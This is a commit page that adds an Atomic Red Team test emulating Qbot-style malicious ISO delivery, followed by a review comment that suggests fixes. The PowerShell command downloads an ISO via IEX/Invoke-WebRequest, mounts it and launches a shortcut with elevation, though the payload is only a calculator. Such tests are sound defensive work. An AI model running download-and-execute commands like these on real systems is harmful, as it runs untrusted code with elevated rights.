Co-authored-by: Shankar <mshank@NTI.local>
Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
Mohana Shankar D
2023-04-27 19:52:56 +05:30
committed by GitHub
parent 7b710ceab5
commit 0061d9fd8c
2 changed files with 21 additions and 0 deletions
+21
@@ -0,0 +1,21 @@
attack_technique: T1204.003
display_name: "User Execution: Malicious Image"
atomic_tests:
- name: Malicious Execution from Mounted ISO Image
description: Adversaries may rely on a user running a malicious image to facilitate execution
supported_platforms:
- windows
executor:
command: |-
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.003/src/qbot-test.iso" -OutFile "$env:TEMP\qbot-test.iso")
Mount-DiskImage -ImagePath "$env:TEMP\qbot-test.iso"
$mountedpath = (Get-DiskImage -ImagePath "$env:TEMP\qbot-test.iso" | Get-Volume).DriveLetter
$finalpath = $mountedpath + ":\"
cd $finalpath
.\calc.exe.lnk
cleanup_command: |-
start-sleep -s 5
stop-process -Name "Calculatorapp" -Force
dismount-diskimage -ImagePath "$env:TEMP\qbot-test.iso"
name: powershell
elevation_required: true
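Review bot: The first `command` line wraps the download in `IEX (...)`, but `iwr` with `-OutFile` returns no output unless `-PassThru` is given, so Invoke-Expression has nothing to evaluate and will most likely raise a null-argument error; if `-OutFile` were ever dropped it would execute the response body instead. Plain `Invoke-WebRequest "<same URL>" -OutFile "$env:TEMP\qbot-test.iso"` is enough, and the download would fit better in a `dependencies` entry with `prereq_command` / `get_prereq_command`. The URL tracks the mutable `master` branch, and the image is mounted and launched under `elevation_required: true` with no integrity check, so consider pinning it to a commit and comparing `(Get-FileHash "$env:TEMP\qbot-test.iso").Hash` with a recorded `<EXPECTED_SHA256>` before `Mount-DiskImage`. `cleanup_command` dismounts the image but leaves the ISO in the temp directory; add `Remove-Item "$env:TEMP\qbot-test.iso" -ErrorAction Ignore`. Adding `-ErrorAction Ignore` to `stop-process` would also keep cleanup from failing when the calculator process has already exited or runs under another name.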
Binary file not shown.